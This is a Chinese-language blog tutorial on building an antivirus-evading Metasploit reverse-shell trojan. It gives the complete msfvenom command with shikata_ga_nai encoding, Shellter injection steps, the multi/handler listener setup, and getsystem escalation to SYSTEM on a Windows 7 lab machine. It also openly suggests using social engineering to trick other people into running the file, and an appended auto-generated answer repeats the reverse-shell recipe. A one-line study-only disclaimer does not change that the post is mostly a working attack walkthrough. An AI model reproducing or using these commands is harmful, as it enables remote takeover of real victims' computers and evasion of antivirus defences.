msf反弹木马之免杀

原理

利用msf模块中的msfvenom模块,首先生成.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。

准备

win7靶机 ip :192.168.56.130
kali攻击机 ip: 192.168.56.135

##实战开始
1.打开kali机,在命令行输入:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.135 lport=1234 -e x86/shikata_ga_nai -i 5 -f exe >/home/kali/Desktop/1.exe

LHOST是主机的ip,用来“提醒”木马成功后应该返回信息给自己的主机。
lport是返回时连接的端口号,需要开启tcp功能,1234端口好像默认开启?
> 后面的那一串表示木马生成的对应地址,为了方便操作我直接生成在桌面上。
-e x86/shikata_ga_nai 为使用shikata_ga_nai的编码方式对攻击载荷进行重新编码
-i 5为使用刚才设定的编码方式对目标进行5次编码

2.命令行输入

shellter

第一个选项选择Aimage.png

3.PE Target 后面填写/home/kali/Desktop/1.exe,即木马所在路径。
然后等待一段时间······
image.png
注意,虽然看着不动,但是上面那个数字一直在跳,所以不是你卡住了~

4.然后选择Yimage.png

5.选择L,payload index 选择1image.png

6.设置LHOST以及LPORTimage.png

等个大概2秒钟,就结束了~
免杀木马制作完成。
命令行输入

msfconsole

进入metasploit。
然后输入

use exploit/multi/handler

开启监听模式
接下来就是设置参数了,可以使用option命令来查看需要设置的参数。主要设置三个:payload、LHOST、LPORT,需要跟木马一样,复制一下就行

set payload windows/meterpreter/reverse_tcp
set lhost 192.168.56.135
set lport 1234

这里大小写随意,都可以被识别。
随后输入

exploit

执行监听命令,也就是攻击开始~

kali端操作结束!

然后利用社会工程学等方式诱骗其他人点击这玩意,就被攻击了。

现在假装win7被骗了,无意中点了我的反弹木马:
image.png

然后输入

shell

就可以获取对方管理员权限。
在输入shell之前,输入getsystem,获得system权限以后,再输入shell就可以获得最高权限啦~
image.png
使用echo %username%可以输出使用者的名字,这里是SJX-PC$,如果是管理员的话,只会显示管理员账号(我这里是“sjx”),而且,看前面的内容也可以知道是system权限:image.png


本篇文章仅供学习使用,读者请勿随意对他人电脑进行操作。

  • 10
    点赞
  • 35
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
回答: 反弹shell是一种利用Metasploit Framework (MSF)进行攻击的技术。它的原理是在目标主机上执行一个经过精心构造的客户端,使目标主机主动连接攻击者的机器的某个端口。使用MSF进行反弹shell的过程如下:首先使用msfvenom模块生成一个被控端的客户端文件,具体命令如下:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx(攻击机IP) lport=xxxx(监听端口)-f exe -o xx.exe。然后将生成的被控端文件放到目标主机内,并在目标主机内执行。此时,攻击者的机器就可以收到目标主机的session,在MSF中使用sessions命令即可查看当前收到的session,并使用session 1命令获取第一个session的会话,然后使用meterpreter模块中的shell命令即可实现反弹shell。\[1\] #### 引用[.reference_title] - *1* *3* [使用msf进行反弹shell+内网渗透](https://blog.csdn.net/JSMaster01/article/details/85402292)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [msf反弹shell](https://blog.csdn.net/weixin_34179762/article/details/93196297)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值